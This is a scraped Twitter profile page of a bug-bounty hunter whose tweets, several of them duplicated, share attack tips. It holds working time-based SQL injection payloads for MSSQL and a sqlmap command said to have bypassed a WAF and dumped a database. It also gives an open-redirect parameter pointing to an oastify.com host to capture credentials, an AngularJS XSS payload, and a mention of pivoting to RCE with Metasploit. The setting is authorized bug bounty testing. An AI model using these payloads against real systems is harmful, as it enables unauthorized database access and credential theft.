Casper0x @_casper0x - Twitter Profile

2 months ago

Finding the right SQLi payload isn’t always easy @lu3ky13 Built this with AI (https://t.co/ZNndSrKISU) For POC: ';IF(LEN(USER_NAME())>=5)WAITFOR DELAY '0:0:20'-- #BugBounty #SQLi #bugbountytips #hackerone #SQL

_casper0x's tweet photo. Finding the right SQLi payload isn’t always easy

@lu3ky13

Built this with AI (https://t.co/ZNndSrKISU) For POC:

';IF(LEN(USER_NAME())>=5)WAITFOR DELAY '0:0:20'--

#BugBounty #SQLi #bugbountytips #hackerone #SQL https://t.co/7OXEvOnz2t

Casper0x @_casper0x

3 months ago

Finding the right SQLi payload isn’t always easy. If you can’t craft custom logic, use Time-Based techniques to prove control. Built this with AI (https://t.co/ZNndSrKISU) for a POC: ';IF(LEN(USER_NAME())>=5)WAITFOR DELAY '0:0:20'-- #BugBounty #SQLi #bugbountytips #hackerone

_casper0x's tweet photo. Finding the right SQLi payload isn’t always easy.

If you can’t craft custom logic, use Time-Based techniques to prove control.

Built this with AI (https://t.co/ZNndSrKISU) for a POC:

';IF(LEN(USER_NAME())>=5)WAITFOR DELAY '0:0:20'--

#BugBounty #SQLi #bugbountytips #hackerone https://t.co/EwA6LeG56o

3

263

35

205

27K

2

225

26

180

16K

Casper0x @_casper0x

3 months ago

@lu3ky13 🫡🔥

0

1

0

32

Casper0x @_casper0x

3 months ago

In this walkthrough I pivot from a compromised Windows 7 host into a hidden internal network and achieve RCE on a protected Windows 10 server using Metasploit. Foothold → Pivot → Internal compromise. Full breakdown: https://t.co/VP7BidK4mN #RedTeam #Pivoting #OffSec #hack

_casper0x's tweet photo. In this walkthrough I pivot from a compromised Windows 7 host into a hidden internal network and achieve RCE on a protected Windows 10 server using Metasploit.

Foothold → Pivot → Internal compromise.

Full breakdown: https://t.co/VP7BidK4mN

#RedTeam #Pivoting #OffSec #hack https://t.co/WB0DSPJcg0

1

7

1

2

726

Casper0x @_casper0x

3 months ago

@mrdami3n No, and yes full db with bypassing WAF using that eval command

1

7

0

382

Who to follow

Aman Singh !!🇮🇳!!

@hackeriron1

bug Hunter (Jai Shree Ram 🙏)📍!!Securityresearcher ⚔️!! Self-learning !!! Indian 🇮🇳 !! Ethical Hacker!!🤞

vishal_patidar

@_vishal_patidar

Love what you do is best way to learn and enjoy.

foorw1nner

@foorw1nner

Cyber Security | Bug Hunter

Casper0x @_casper0x

3 months ago

SQLi allowed database enumeration and dumping, Still a bit weird the report was closed as Informative sqlmap -r r.txt --eval="import base64; payload_part='select 1 where 1=1'; GUID='x%27 or length(payload_part)=0'; del payload_part" #bugbounty #sqli #hackerone #bugbountytips

_casper0x's tweet photo. SQLi allowed database enumeration and dumping, Still a bit weird the report was closed as Informative

sqlmap -r r.txt --eval="import base64; payload_part='select 1 where 1=1'; GUID='x%27 or length(payload_part)=0'; del payload_part"

#bugbounty #sqli #hackerone #bugbountytips https://t.co/vq71Wz1U00

7

160

9

76

7K

Casper0x @_casper0x

3 months ago

@runyourcron Yes🙂

0

1

0

510

Casper0x @_casper0x

3 months ago

Open Redirect isn’t always “low”. Abused a redirect parameter during authentication flow → redirected login to attacker domain → captured credentials. login.php?url=//\\.oastify.com Write-up publishing soon. https://t.co/ZNndSrKISU #BugBounty #bugbountytips #ATO #hackerone

$_casper0x's tweet photo. Open Redirect isn’t always “low”. Abused a redirect parameter during authentication flow → redirected login to attacker domain → captured credentials. login.php?url=//\\.oastify.com Write-up publishing soon. https://t.co/ZNndSrKISU #BugBounty #bugbountytips #ATO #hackerone https://t.co/WDhArenTMQ$

1

136

18

63

5K

Casper0x @_casper0x

3 months ago

Simple XSS payload for AngularJS testing. Older AngularJS versions are still vulnerable to expression injection. {{$on.constructor('alert(document.domain)')()}} #BugBounty #XSS #bugbountytips #hackerone

$_casper0x's tweet photo. Simple XSS payload for AngularJS testing. Older AngularJS versions are still vulnerable to expression injection. {{$on.constructor('alert(document.domain)')()}} #BugBounty #XSS #bugbountytips #hackerone https://t.co/wjewjN8urm$

1

160

22

109

7K

Casper0x @_casper0x

3 months ago

@vShelled @version I test on all parameters I see, and using the delay payload is the best way to find SQLi

0

107

Casper0x @_casper0x

4 months ago

Time-Based SQL Injection Is Still Everywhere!🔥 You can fingerprint the backend DB version with '; IF (SUBSTRING(@@VERSION,1,1) = 'M') WAITFOR DELAY '0:0:15' -- Delay = proof. #RedTeam #BugBounty #SQLi #bugbountytips #hackerone

_casper0x's tweet photo. Time-Based SQL Injection Is Still Everywhere!🔥

You can fingerprint the backend DB version with

'; IF (SUBSTRING(@@VERSION,1,1) = 'M') WAITFOR DELAY '0:0:15' --

Delay = proof.

#RedTeam #BugBounty #SQLi #bugbountytips #hackerone https://t.co/OdMVczssSk

0

299

45

217

17K

Casper0x @_casper0x

3 months ago

Finding the right SQLi payload isn’t always easy. If you can’t craft custom logic, use Time-Based techniques to prove control. Built this with AI (https://t.co/ZNndSrKISU) for a POC: ';IF(LEN(USER_NAME())>=5)WAITFOR DELAY '0:0:20'-- #BugBounty #SQLi #bugbountytips #hackerone

3

263

35

205

27K